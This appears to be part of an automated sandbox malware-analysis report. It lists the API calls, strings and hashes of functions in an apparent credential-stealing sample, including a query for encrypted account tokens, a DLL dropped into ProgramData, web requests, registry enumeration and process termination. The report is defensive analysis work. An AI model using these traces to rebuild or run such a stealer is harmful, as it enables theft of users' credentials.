                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • lstrlen.KERNEL32(00000000), ref: 00EABC6F
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00EABC9D
                                • lstrlen.KERNEL32(00000000), ref: 00EABD75
                                • lstrlen.KERNEL32(00000000), ref: 00EABD89
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 5f3f70fd3715653d3664a5ba883340278da789efb1506380892b5d651b98ea6f
                                • Instruction ID: 087629aab905ef9b6c8d5a079843f3459ba2eaa96867a24e07d9f2e439de37ee
                                • Opcode Fuzzy Hash: 5f3f70fd3715653d3664a5ba883340278da789efb1506380892b5d651b98ea6f
                                • Instruction Fuzzy Hash: CFB15571910108ABCF14FBA0DD96EEF77B9AF14300F4455B8F51676192EF346A48CB62
                                Function 00EB6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 74910f8ec28889e11b32ff89a6436b1d1809bc3628c83d74511f2c1f33dca82c
                                • Instruction ID: 014dfabcdad48cbac9f1d4eff8ac6414c976c70c74b526a2ec4f3800420e5654
                                • Opcode Fuzzy Hash: 74910f8ec28889e11b32ff89a6436b1d1809bc3628c83d74511f2c1f33dca82c
                                • Instruction Fuzzy Hash: 12F05E30909209EFD758AFE0F80D7ACBB31EB04707F1141B5F629B66C4D6744A809B51
                                Function 00EB08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00EB08DC,C:\ProgramData\chrome.dll), ref: 00EB9871
                                  • Part of subcall function 00EAA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00EAA098
                                • StrCmpCA.SHLWAPI(00000000,01BFA048), ref: 00EB0922
                                • StrCmpCA.SHLWAPI(00000000,01BF9F48), ref: 00EB0B79
                                • StrCmpCA.SHLWAPI(00000000,01BF9F68), ref: 00EB0A0C
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00EB0C35
                                Strings
                                • C:\ProgramData\chrome.dll, xrefs: 00EB0C30
                                • C:\ProgramData\chrome.dll, xrefs: 00EB08CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                • API String ID: 585553867-663540502
                                • Opcode ID: 7668a5d9c83fe9d424cb6af39747d275e1d8ecb3c102e090b626ef96c808937a
                                • Instruction ID: 79422ddfb471bd3ec78cc228d83dfc36b495c2887afe617f0e66e1fc7582f953
                                • Opcode Fuzzy Hash: 7668a5d9c83fe9d424cb6af39747d275e1d8ecb3c102e090b626ef96c808937a
                                • Instruction Fuzzy Hash: 89A156717002089FCF28EF64D996EEE77B6AF95300F54956DE40A6F341DA30AA05CB92
                                Function 00F1F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                Download Yara Rule
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 00F1FA1F
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00F1FA27
                                • _ValidateLocalCookies.LIBCMT ref: 00F1FAB0
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00F1FADB
                                • _ValidateLocalCookies.LIBCMT ref: 00F1FB30
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                • Instruction ID: f218ed2d84e0af8985aab4d01119523c09fcd33306f1fbe9517170843e45e505
                                • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                • Instruction Fuzzy Hash: 6541B331D00219EFCF10DF68CC84ADE7BB5BF49324F148165E818AB392D7399989DB91
                                Function 00EA5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EA501A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA5021
                                • InternetOpenA.WININET(00EC0DE3,00000000,00000000,00000000,00000000), ref: 00EA503A
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EA5061
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EA5091
                                • InternetCloseHandle.WININET(?), ref: 00EA5109
                                • InternetCloseHandle.WININET(?), ref: 00EA5116
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: ebb3b52c405ef4791c0ef42905e707b64a3915d48c1932ffd74f0b0d79284f9a
                                • Instruction ID: 47d8f326fb438a754591634f99e0240617c1cbdd590d6b0723c911d164e8f950
                                • Opcode Fuzzy Hash: ebb3b52c405ef4791c0ef42905e707b64a3915d48c1932ffd74f0b0d79284f9a
                                • Instruction Fuzzy Hash: 4631F6B5A40218ABDB24CF54DC89BDDB7B5AB48304F1081E8FA09B7381D7706EC58F98
                                Function 00EB8290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01BFEF38,00000000,?,00EC0E14,00000000,?,00000000), ref: 00EB82C0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB82C7
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EB82E8
                                • wsprintfA.USER32 ref: 00EB833C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: 99e3a7b626ca632431708ccd5630dd6b92944852b13d37747b1285a638dbabdf
                                • Instruction ID: a9658fac023732233bb7c9a437ebbd9dba129b560cd29dfe8c0554988207a018
                                • Opcode Fuzzy Hash: 99e3a7b626ca632431708ccd5630dd6b92944852b13d37747b1285a638dbabdf
                                • Instruction Fuzzy Hash: C721F4B1E44208ABDB14DFD4CD4AFAFB7B8EB44B14F104629F615BB280D77869008BA5
                                Function 00EB856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EB85B6
                                • wsprintfA.USER32 ref: 00EB85E9
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EB860B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB861C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB8629
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • RegQueryValueExA.ADVAPI32(00000000,01BFEE00,00000000,000F003F,?,00000400), ref: 00EB867C
                                • lstrlen.KERNEL32(?), ref: 00EB8691
                                • RegQueryValueExA.ADVAPI32(00000000,01BFEF08,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EC0B3C), ref: 00EB8729
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB8798
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB87AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 9e4e4c81629156b3c7a5f40dcef8006a0d207a66e147580d7d444a127e74245c
                                • Instruction ID: 61aa69f3faaef599ce755ea19ad5a5e70c5850cfb9daf182c5fa80f009a7ed72
                                • Opcode Fuzzy Hash: 9e4e4c81629156b3c7a5f40dcef8006a0d207a66e147580d7d444a127e74245c
                                • Instruction Fuzzy Hash: 8B21EB7191021CABDB24DB54DD85FE9B3B8FB48704F1081E9E619A6280DF716AC5CFE4
                                Function 00EB99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB99C5
                                • Process32First.KERNEL32(00EAA056,00000128), ref: 00EB99D9
                                • Process32Next.KERNEL32(00EAA056,00000128), ref: 00EB99F2
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB9A4E
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB9A6C
                                • CloseHandle.KERNEL32(00000000), ref: 00EB9A79
                                • CloseHandle.KERNEL32(00EAA056), ref: 00EB9A88
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 2696918072-0
                                • Opcode ID: 1f5a502337edfacfc45b9c273aaf16d5b7cbb73a394f78b7eddae119ce7ac274
                                • Instruction ID: 745b5d2820008c7b003214bc1ef252d1edf831e00ed48431bde5435c1989cb67
                                • Opcode Fuzzy Hash: 1f5a502337edfacfc45b9c273aaf16d5b7cbb73a394f78b7eddae119ce7ac274
                                • Instruction Fuzzy Hash: C821FC75900218EBDB35DFA1D888BEEB7B9BB48304F1041D8E619A6284D7749EC4CF90
                                Function 00EB7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7834
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB783B
                                • RegOpenKeyExA.ADVAPI32(80000002,01BECE80,00000000,00020119,00000000), ref: 00EB786D
                                • RegQueryValueExA.ADVAPI32(00000000,01BFEE90,00000000,00000000,?,000000FF), ref: 00EB788E
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB7898
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: e004b7c629892ee2a400bbf788070d75f30de4764c68100f0d735da45bb93cdb
                                • Instruction ID: 97b034a49a34b99381c1a5e08c717ed4d5ec211be97a7f6c7b1c3ba25cc61397
                                • Opcode Fuzzy Hash: e004b7c629892ee2a400bbf788070d75f30de4764c68100f0d735da45bb93cdb
                                • Instruction Fuzzy Hash: D701F475A44305BBE718DBE4DD4DFAE7779EB84700F104068FA55A6784D6709940CB50
                                Function 00EB9470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00EB3D3E,?), ref: 00EB948C
                                • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00EB94A9
                                • CloseHandle.KERNEL32(000000FF), ref: 00EB94B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
